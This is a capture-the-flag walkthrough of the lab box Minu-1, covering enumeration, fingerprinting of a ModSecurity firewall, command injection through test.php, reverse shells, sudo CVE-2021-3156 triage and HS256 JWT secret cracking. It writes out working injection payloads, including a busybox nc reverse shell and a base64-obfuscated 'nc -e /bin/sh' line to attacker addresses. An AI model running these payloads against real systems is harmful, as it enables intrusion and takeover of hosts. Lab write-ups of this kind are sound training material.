How to Bypass a WAF and Capture the Flag on Minu-1 – A Complete Pen‑Test Walkthrough
This step‑by‑step guide demonstrates how to enumerate a vulnerable host, identify and fingerprint its Web Application Firewall, apply multiple WAF‑bypass techniques—including fuzzing, command injection, binary abuse and URL‑encoding tricks—to obtain a stable shell, perform privilege escalation, decode a JWT token and finally retrieve the root flag.txt.
1. NMAP Information Gathering
Run a SYN scan with service and OS detection against the target IP 10.163.197.21 using nmap -sS -sV -T5 -A 10.163.197.21. The scan reveals open ports 25 (SMTP), 80 (Apache 2.4.7 on Ubuntu) and 110 (POP3).
2. Web Information Enumeration
Access the HTTP service on port 80 and discover the default Apache page. Use dirb http://10.163.197.21/ to brute‑force directories. Most requests return 403 rather than 404, which suggests a WAF or filtering layer in front of Apache; only index.html returns 200.
Search for files with specific extensions using dirb -X .php,.html http://10.163.197.21/ (dirb takes the extension list comma‑separated), which discovers test.php. Visiting http://10.163.197.21/test.php shows a “Read last visitor data” message, hinting at a file parameter and possible file inclusion.
3. WAF Identification (Part 1)
Use the tool wafw00f http://10.163.197.21/ to fingerprint the firewall. The newer version fails to identify it, but the older version reports ModSecurity, an open‑source WAF.
4. WAF Bypass (Part 2) – Fuzzing
Apply wfuzz with the All_attack.txt payload list against the file parameter. Filter out 403/404 responses to focus on successful payloads.
wfuzz -c -z file,/usr/share/wfuzz/wordlist/Injections/All_attack.txt --hc 404,403 http://10.163.197.21/test.php?file=FUZZ
One successful payload is |dir, showing that the file parameter reaches a shell and that a pipe character passes the filter; this is the foothold for the command execution that follows.
5. WAF Bypass (Part 3) – Command Chaining
Appending a semicolon ; or ampersand & separates commands (a raw & in a URL starts a new query parameter, so it has to be sent as %26; see section 7). Example: http://10.163.197.21/test.php?file=last.html;id executes id despite the filter.
6. WAF Bypass (Part 4) – Binary Abuse
Leverage binaries listed on GTFOBins. Here busybox, with its built‑in nc, gives a reverse shell to a listener on the attacker host (10.163.196.91 port 6789 in this walkthrough):
http://10.163.197.21/test.php?file=YLion;busybox nc 10.163.196.91 6789 -e sh
7. WAF Bypass (Part 5) – URL‑Encoding & Base64
Encode the ampersand as %26 and spaces as %20 so the shell metacharacters survive the query string. To hide the command itself from the WAF, base64‑encode it and let the target decode it and pipe it into a shell. Because base64 emits = padding whenever the input length is not a multiple of 3 bytes, pad the plaintext with a space before encoding so that no = appears in the URL.
%26/bin/echo bmMgLWUgL2Jpbi9zaCAxMC4xNjMuMTk2Ljg5IDEzMzcK|/usr/bin/base64 -d|/bin/sh
The encoded string decodes to nc -e /bin/sh 10.163.196.89 1337, a second reverse shell to the attacker's listener.
8. Stable Shell Upgrade
After obtaining a reverse shell, upgrade it to an interactive TTY:
python3 -c 'import pty; pty.spawn("/bin/bash")'
SHELL=/bin/bash script -q /dev/null
If job control and tab completion are still missing, background the shell with Ctrl‑Z, run stty raw -echo; fg on the attacker side and set export TERM=xterm in the target shell.
9. Internal Information Gathering
Run uname -a to confirm a 32‑bit Linux kernel. Upload and execute linpeas.sh for automated privilege‑escalation enumeration.
The script reveals a sudo version vulnerable to CVE‑2021‑3156 (Baron Samedit, a heap overflow in sudoedit's argument handling) and a user bob with sudo rights.
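A practitioner will want to confirm the linpeas finding before spending time on an exploit, since distributions backport fixes without bumping the upstream version. The following is an added example (not linpeas or any tool from the page) that parses the first line of sudo --version against the affected ranges published for CVE‑2021‑3156 (1.8.2 to 1.8.31p2 and 1.9.0 to 1.9.5p1) and classifies the output of the sudoedit -s / behavioural test, which is the reliable check: a vulnerable sudo answers with a sudoedit: error, a patched one prints its usage. The version strings and command outputs below are constructed inputs, not from the target.

```python
import re
from typing import Tuple

# Added example, not from the original walkthrough. Affected ranges are the
# ones published for CVE-2021-3156; inputs below are constructed for the demo.
VULN_RANGES = [
    ((1, 8, 2, 0), (1, 8, 31, 2)),   # legacy 1.8.2 .. 1.8.31p2
    ((1, 9, 0, 0), (1, 9, 5, 1)),    # stable 1.9.0 .. 1.9.5p1
]


def parse_sudo_version(text: str) -> Tuple[int, int, int, int]:
    """Turn 'Sudo version 1.8.31p2' (first line of `sudo --version`) into a
    comparable tuple (major, minor, patch, p-level); absent parts are 0."""
    m = re.search(r"(\d+)\.(\d+)(?:\.(\d+))?(?:p(\d+))?", text)
    if not m:
        raise ValueError(f"no sudo version found in {text!r}")
    major, minor, patch, plevel = (int(g) if g else 0 for g in m.groups())
    return (major, minor, patch, plevel)


def is_baron_samedit_vulnerable(version_text: str) -> bool:
    """Version-based triage only: a backported distro fix keeps the old
    upstream number and will be reported as vulnerable here."""
    v = parse_sudo_version(version_text)
    return any(lo <= v <= hi for lo, hi in VULN_RANGES)


def classify_sudoedit_output(stderr: str) -> str:
    """Classify what `sudoedit -s /` printed on stderr.

    Vulnerable builds reach the buggy argument parsing and complain that '/'
    is not a regular file; patched builds reject the -s/-e combination and
    print their usage text instead.
    """
    first = stderr.strip().splitlines()[0] if stderr.strip() else ""
    if first.startswith("sudoedit:"):
        return "vulnerable"
    if first.startswith("usage:"):
        return "patched"
    return "unknown"


if __name__ == "__main__":
    # Constructed sample inputs for the demo
    for line in ("Sudo version 1.8.21p2", "Sudo version 1.9.5p2", "Sudo version 1.8.1"):
        print(line, "->", "vulnerable" if is_baron_samedit_vulnerable(line) else "not in range")
    print(classify_sudoedit_output("sudoedit: /: not a regular file"))
    print(classify_sudoedit_output("usage: sudoedit [-AknS] [-r role] [-t type] file ..."))
```

Run the version check first as cheap triage, then the sudoedit test on the box itself; treat only a "vulnerable" classification from the behavioural test as confirmation.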
10. Privilege Escalation – JWT Analysis
A hidden file ._pw_ contains a JWT token. Decoding the header and payload shows an HS256‑signed token, i.e. one whose signature is an HMAC over a shared secret, so the secret can be brute‑forced offline if it is weak. Using the open‑source tool jwtcrack discovers the secret mlnV1, which also turns out to be the root password, allowing login as root.
./jwtcrack eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJzdWIiOiIxMjM0NTY3ODkwIiwibmFtZSI6IkpvaG4gRG9lIiwiaWF0IjoxNTE2MjM5MDIyfQ.pn55j1CFpcLjvReaqyJr0BPEMYUsBdoDxEPo6Ft9cwg
11. Capture the Flag
After escalating to root, read /root/flag.txt to obtain the final flag.
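To close out the JWT step from section 10, here is an added example (not the page's jwtcrack tool and not the target's code) that decodes a token and then brute‑forces an HS256 secret the way jwtcrack does: recompute the HMAC for each candidate and compare it to the token's signature. The article's token is decoded to show its header and payload; the wordlist, the secret winter2020 and the token signed with it are constructed for this example, and whether mlnV1 verifies the article's token is not checked here.

```python
import base64
import hashlib
import hmac
import json
from typing import Iterable, Optional, Tuple

# Added example, not from the original walkthrough. ARTICLE_TOKEN is the token
# quoted in the article; the wordlist and demo secret are constructed.
ARTICLE_TOKEN = (
    "eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9."
    "eyJzdWIiOiIxMjM0NTY3ODkwIiwibmFtZSI6IkpvaG4gRG9lIiwiaWF0IjoxNTE2MjM5MDIyfQ."
    "pn55j1CFpcLjvReaqyJr0BPEMYUsBdoDxEPo6Ft9cwg"
)
SAMPLE_WORDLIST = ["password", "secret", "admin123", "winter2020", "letmein"]


def b64url_encode(data: bytes) -> str:
    return base64.urlsafe_b64encode(data).rstrip(b"=").decode()


def b64url_decode(s: str) -> bytes:
    # JWT strips '=' padding; restore it so the decoder accepts the segment.
    return base64.urlsafe_b64decode(s + "=" * (-len(s) % 4))


def decode_jwt(token: str) -> Tuple[dict, dict]:
    """Return (header, payload) without verifying the signature."""
    header_b64, payload_b64, _ = token.split(".")
    return json.loads(b64url_decode(header_b64)), json.loads(b64url_decode(payload_b64))


def sign_hs256(header_b64: str, payload_b64: str, secret: str) -> str:
    mac = hmac.new(secret.encode(), f"{header_b64}.{payload_b64}".encode(), hashlib.sha256)
    return b64url_encode(mac.digest())


def make_token(payload: dict, secret: str) -> str:
    """Mint an HS256 token (used here only to build the demo sample)."""
    header_b64 = b64url_encode(json.dumps({"alg": "HS256", "typ": "JWT"}, separators=(",", ":")).encode())
    payload_b64 = b64url_encode(json.dumps(payload, separators=(",", ":")).encode())
    return f"{header_b64}.{payload_b64}.{sign_hs256(header_b64, payload_b64, secret)}"


def crack_hs256(token: str, candidates: Iterable[str]) -> Optional[str]:
    """Dictionary attack on the HMAC secret; None if no candidate matches."""
    header_b64, payload_b64, sig_b64 = token.split(".")
    header = json.loads(b64url_decode(header_b64))
    if header.get("alg") != "HS256":
        return None  # only a symmetric HMAC secret can be guessed this way
    for secret in candidates:
        if hmac.compare_digest(sign_hs256(header_b64, payload_b64, secret), sig_b64):
            return secret
    return None


if __name__ == "__main__":
    header, payload = decode_jwt(ARTICLE_TOKEN)
    print("header:", header)
    print("payload:", payload)
    demo = make_token({"sub": "bob"}, "winter2020")      # constructed sample
    print("recovered secret:", crack_hs256(demo, SAMPLE_WORDLIST))
```

Decoding the header first matters: a token with alg RS256 cannot be attacked this way, and a token whose alg the server trusts blindly is a different bug (alg confusion) from the weak-secret one shown here. The loop itself is the whole of what jwtcrack does, just over a larger keyspace.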
This article focuses on WAF bypass techniques while also covering enumeration, shell stabilization, privilege escalation, and JWT cracking to demonstrate a complete penetration‑testing workflow.
MaGe Linux Operations
